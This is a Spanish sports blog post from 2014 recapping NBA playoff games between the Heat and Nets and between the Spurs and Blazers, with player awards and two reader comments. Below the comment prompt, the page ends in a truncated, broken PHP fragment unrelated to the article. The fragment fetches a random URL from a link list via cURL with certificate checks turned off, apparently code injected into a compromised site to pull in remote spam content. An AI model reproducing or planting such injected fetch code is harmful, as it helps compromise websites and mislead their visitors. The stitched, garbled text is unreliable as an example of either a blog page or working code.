La Crónica: Vistas para sentencia

13 de May de 2014 por Simon

Tanto Miami Heat como San Antonio Spurs tendrán la oportunidad de cerrar sus series de aquí a dos noches cuando reciban a sus respectivos rivales. Los Spurs tenían anoche la oportunidad de barrer a sus rivales pero fueron condescendientes y les otorgaron un descanso en el castigo constante que estaba siendo esta serie para los Blazers. Por su parte, los Heat salieron muy serios al Barclays Center con la clara intención de dejar la serie lista para cerrarla en Miami y lo consiguieron gracias a un Lebron James imperial.

Como hemos comentado anteriormente, los de Spoelstra salieron muy concentradosen este 4 partido tratando de coger ventajs desde el primer momento. Los Heat pronto cosecharon una ventaja cercana a la decena pero el desempeño de Livingston y de Anderson consiguió minimizar la estampida inicial de los visitantes. En el segundo cuarto fueron los Nets, ya más metidos en el encuentro, los que tomaron la iniciativa con Deron Williams como gran protagonista. Cuando los locales consiguieron su máxima ventaja Spoelstra decidió que era el momento de que entrara de nuevo a la cancha Lebron, que descansaba desde el final del primer cuarto, y ahí se acabaron las concesiones para Brooklyn. Con 13 puntos en los seis minutos que quedaban cerraba el segundo cuarto con su equipo por delante en el marcador. Durante la segunda parte los Nets lograron mantener el partido igualado a pesar de la exhibición que seguía dando “King James” gracias a su dominio del rebote e incluso llegaron a ponerse por delante en algún momento pero en los minutos decisivos nadie apareció por el bando local y fueron los Heat los que se llevaron el partido al bolsillo gracias a un triple de Chris Bosh y los tiros libres de Ray Allen (102-96). 49 fueron los puntos con los que cerró el partido Lebron James que se mostró muy decepcionado al finalizar el choque por fallar el último tiro libre que le habría permitido llegar por primera vez al medio centenar de puntos en Play Off. La serie viaja ahora a Miami donde el jueves los Heat deben cerrarla para no complicarse la vida y poder preparar la final de conferencia. 

Por su parte los Blazers se enfrentaban a un partido a vida o muerte en su casa ante los Spurs. Los locales querían mantenerse a flote y evitar que los tejanos sacaran la escoba para barrerles en la serie.  Todos esperábamos a Damian Lillard, que tenía que aparecer y convertirse el líder que evitara que su equipo terminara la temporada con un sabor amargo, y el chaval no decepcionó a nadie, de hecho casi nunca lo hace. Con 25 puntos fue el faro que iluminó el camino a los suyos para derrotar a los Spurs. Estuvo bien apoyado por Nico Batum que coqueteó con el triple doble y por los buenos rendimientos anotadores de Will Barton y Lamarcus Aldridge. Portland sólo había estado por delante en el marcador durante poco más de 30 segundos en lo que iba de serie pero en este encuentro quisieron mandar desde el inicio en el que Wesley Matthews marcaba la tendencia con dos triples casi consecutivos. Esta vez la defensa de San Antonio no podía parar el juego de los de Oregon. En el segundo cuarto los suplentes de Popovich lograron equilibrar la balanza y frenar un poco el ímpetu local pero en el segundo tiempo los Blazers refrendaron todo lo que apuntaban en el primero, y consiguieron dejar muy atrás en el marcador a los vistantes que no mostraban la tensión ni la seriedad de otros días. Portland llegó a acumular 20 puntos de ventaja y dejó el partido sentenciado mediado el último cuarto (92-103). A pesar de la superioridad de Portland en este partido, la serie no tiene pinta de alargarse más allá del quinto partido en el se espera que San Antonio vuelva a su nivel habitual y cierre la serie para poder descansar a la espera de que Thunder y Clippers decidan la suya.

PREMIOS

MVP: Los 49 puntos de Lebron James igualan su marca personal en un partido de playoffs y mejoran el record de los Heat que tenía Dwyane Wade. “The King” se mostró imparable en todo momento para los Nets.

Sorpresa: Nico Batum anotó sólo 14 puntos pero cogió 14 rebotes y repartió 8 asistencias. Su compañero Will Barton va enseñando la patita poco a poco, ayer anotó 17 puntos y cogió 6 rebotes.

Decepción: Manu Ginobili se quedó en solo 2 puntos tras fallar 5 de sus  lanzamientos. Estuvo muy desacertada como prácticamente todo el equipo.

Esfuerzo en vano: Paul Pierce fue el que más plantó cara a Lebron en Brooklyn al anotar 16 puntos y capturar 7 rebotes.

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Esteban dice:
    #1

    wow james is a man

      Citar

  2. GreenPride dice:
    #2

    Pues efectivamente las dos series parecen preparadas para que los finalistas del año pasado den el salto a las finales de conferencia de este curso. En Brooklyn el rey decidió que no iba a dejar que la serie se complicase y ejerció de martillo pilón ante unos Nets que intentaron mantenerse haciendo la goma y consiguieron llegar a un final igualado pero que a última hora se vieron superados en las jugadas clave por los Heat. Los de Miami se mostraron muy serios y ya atisban el duelo con Indiana en una reedición de las finales de conferencia pasadas. Si Hibbert termina de reencontrarse puede ser una serie durísima aunque las sensaciones actuales dan como claros favoritos a los Heat.
    Por su parte San Antonio se dejó ir en cuanto el ímpetu de Lillard y Batum les puso con una distancia medio considerable. Seguro que en el 5º no habrá noche de descanso para Duncan en la segunda parte y que los viejos Spurs querrán tener unos días de descanso antes de empezar las finales de conferencia contra el que salga de la batalla entre Clippers y Thunder. Bien por los Blazers que jugaron con ganas y ambición pese a ir 3-0 en contra y salvan el honor. Su temporada ha sido más que notable y hay que agradecerles que sigan a muerte a pesar de ser claramente inferiores.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>